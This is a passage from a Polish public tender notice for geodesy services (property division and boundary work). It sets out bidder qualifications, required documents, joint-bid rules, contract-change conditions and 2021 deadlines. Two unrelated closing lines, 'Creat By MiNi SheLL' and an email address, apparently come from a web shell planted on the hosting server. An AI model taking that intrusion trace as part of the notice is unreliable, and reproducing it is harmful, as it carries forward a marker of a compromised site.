class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej. Warunek ten<br/>Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże Zamawiającemu, że dysponuje co<br/>najmniej jedną osobą, która będzie brała udział w realizacji zamówienia, posiadającą wymagane<br/>uprawnienia w zakresie geodezji, o których mowa w art. 43 pkt 2 ustawy Prawo geodezyjne i<br/>kartograficzne (Dz.U. 2020 poz. 2052) tj. rozgraniczanie i podziały nieruchomości (gruntów) oraz<br/>sporządzanie dokumentacji do celów prawnych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób (załącznik nr 4 do SWZ) skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego (co najmniej jedna osoba posiadająca wymagane uprawnienia w<br/>zakresie geodezji, o których mowa w art. 43 pkt 2 ustawy Prawo geodezyjne i kartograficzne (Dz.U.<br/>2020 poz. 2052) tj. rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji<br/>do celów prawnych), w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, w celu spełnienia warunku udziału<br/>w postępowaniu - wzór zobowiązania stanowi załącznik nr 5 do SWZ,<br/>2) oświadczenie wynikające z art. 117 ust 4 ustawy Pzp, o którym mowa w rozdziale VIII ust. 8.2<br/>pkt 2) SWZ - w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ.<br/>3) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów, z zastrzeżeniem ust. 16.8. swz.<br/>Powyższy wymóg stosuje się również odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy oraz do podwykonawcy.<br/>4) pełnomocnictwo, jeżeli Wykonawca samodzielnie składający ofertę jest reprezentowany przez<br/>pełnomocnika;<br/>5) w przypadku Wykonawców wspólnie ubiegających się o zamówienie – pełnomocnictwo do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania<br/>jednej oferty, przez dwa lub więcej podmiotów), pod warunkiem, że taka oferta będzie spełniać<br/>następujące wymagania: 1) Wykonawcy wspólnie ubiegający się o zamówienie, zgodnie z art.<br/>58 ust 2 ustawy Pzp muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę;2) Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą<br/>stosowne pełnomocnictwo - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę; UWAGA: pełnomocnictwo, o którym mowa powyżej (pkt 1 i 2) może<br/>wynikać albo z dokumentu pod taką samą nazwą, albo z umowy podmiotów wspólnie<br/>składających ofertę;3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała<br/>wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub<br/>pełnomocnika); 4) Wszelka korespondencja dokonywana będzie wyłącznie z Wykonawcą<br/>występującym jako Pełnomocnik pozostałych;5) Wskazanie lidera w druku oferty (w przypadku<br/>oferty złożonej przez konsorcjum);10.2. W przypadku gdy oferta wspólna Wykonawcy zostanie<br/>najwyżej oceniona, Wykonawca przed udzieleniem zamówienia, składa na wezwanie<br/>Zamawiającego dokumenty o których mowa w rozdziale IX ust. 9.4. SWZ, przy czym dokumenty<br/>wymienione w rozdziale IX ust. 9.4. pkt 1) SWZ składa odrębnie każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. 10.3. W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia żaden z nich nie może podlegać wykluczeniu z<br/>postępowania na podst. art. 108 ust. 1 oraz art. 109. ust. 1 pkt 4, 5 i 7 ustawy Pzp.10.4. Nie<br/>dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym również jest złożenie<br/>przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.10.5. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.10.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W tym przypadku Wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4<br/>ustawy Pzp, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 6 do SWZ (forma złożenia<br/>oświadczenia została opisana w ust. 16.5. i 16.6. SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.1. Zamawiający przewiduje możliwość wprowadzenia zmiany postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>21.2. Dopuszcza się zmianę umownego terminu, w przypadku wystąpienia co najmniej jednej z<br/>następujących okoliczności:<br/>1) wystąpienia warunków siły wyższej – przez którą należy rozumieć wystąpienie zdarzeń<br/>i okoliczności, na które Strony nie mają wpływu i przed którymi nie mogły się zabezpieczyć, w<br/>tym w szczególności udokumentowane warunki atmosferyczne uniemożliwiające wykonanie<br/>usług, epidemie i inne klęski;<br/>2) wystąpiła konieczność przeprowadzenia rozgraniczenia;<br/>3) udokumentowane (potwierdzone dokumentami) przedłużające się procedury administracyjne,<br/>w tym związane z art.12b ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne;<br/>4) nastąpiła zmiana lub uchwalenie miejscowego planu zagospodarowania przestrzennego bądź<br/>studium, wpływająca na termin realizacji zamówienia, a także w przypadku gdy część<br/>nieruchomość podlegająca podziałowi znajduje się na terenie objętym planem miejscowym o<br/>przeznaczeniu innym niż rolne co rodziłoby konieczność dokonania jej podziału zgodnie z<br/>zapisami ustawy o gospodarce nieruchomościami;<br/>5) przekazanie nieruchomości lub jej części (działki) na rzecz instytucji samorządowych lub<br/>innych;<br/>6) w wyniku działania osób trzecich, wykonanie prac będzie utrudnione, a działania te nie są<br/>konsekwencją winy którejkolwiek ze Stron;<br/>7) nastąpiła okoliczność wymieniona w § 12 ust. 3 umowy – dot. zad. częściowego nr 1.<br/>Termin Umowy może ulec zmianie o czas, w jakim wyżej wskazane okoliczności wpłynęły na<br/>termin wykonania Umowy przez Wykonawcę, tj. uniemożliwiły Wykonawcy terminową realizację<br/>przedmiotu Umowy.<br/>21.3. Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, w<br/>przypadku wystąpienia co najmniej jednej z następujących okoliczności:<br/>1) wystąpi konieczność wyłączenia działek z umowy lub włączenie dodatkowych, których podział<br/>z przyczyn nie dających się przewidzieć nie jest możliwy do wykonania lub stał się konieczny w<br/>zakresie zawartym w SWZ/umowie;<br/>2) realizacja części przedmiotu zamówienia, z przyczyn o obiektywnym charakterze nie jest<br/>możliwa do wykonania, co spowoduje zmianę zakresu świadczenia;<br/>3) zachodzi konieczność wydzielenia dodatkowych działek w ramach zadania określonego w<br/>umowie, z przyczyn nie dających się przewidzieć w chwili zawarcia umowy, w tym przypadku<br/>Zamawiający dopuszcza zwiększenie wynagrodzenia Wykonawcy do 10% wartości zamówienia<br/>określonego w § 6 ust.1 umowy.<br/>21.4. Dopuszcza się zmianę osób odpowiedzialnych za wykonanie zamówienia z<br/>zastrzeżeniem, że wprowadzona zmiana nie może skutkować zmianą Wykonawcy zamówienia:<br/>1) zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne<br/>legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w SWZ,<br/>2) zmiany kluczowego personelu Wykonawcy na skutek zdarzeń losowych, zmian<br/>kadrowopersonalnych, utraty wymaganych uprawnień, utraty stanowiska. Zmiana kluczowego<br/>personelu<br/>Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej<br/>równoważnych.<br/>21.5. Zmiany, o których mowa powyżej, z wyjątkiem ust. 21. 3 pkt 3, nie będą stanowić<br/>podstawy zwiększenia wynagrodzenia.<br/>21.6. Dopuszcza się zmianę umownego wynagrodzenia w przypadku ustawowej zmiany<br/>podatku od towarów i usług (VAT).<br/>21.7. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez<br/>Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia, oprócz ceny brutto, stanowi kryterium wyboru oferty.<br/>Wykonawca w druku oferty (zał. nr 1 do SWZ) deklaruje termin wykonania zamówienia, który:<br/>2) dla zadania częściowego nr 1<br/>nie może być krótszy niż 90 dni i nie może być dłuższy niż 120 dni. W przypadku gdy Wykonawca wpisze termin krótszy niż 90 dni bądź dłuższy niż 120 dni, Zamawiający odrzuci ofertę jako niezgodną z warunkami zamówienia.<br/>2) dla zadania częściowego nr 2 (dla Etapu I zamówienia)<br/>nie może być krótszy niż 70 dni i nie może być dłuższy niż 120 dni. W przypadku gdy Wykonawca<br/>wpisze termin krótszy niż 70 dni bądź dłuższy niż 120 dni, Zamawiający odrzuci ofertę jako niezgodną z warunkami zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com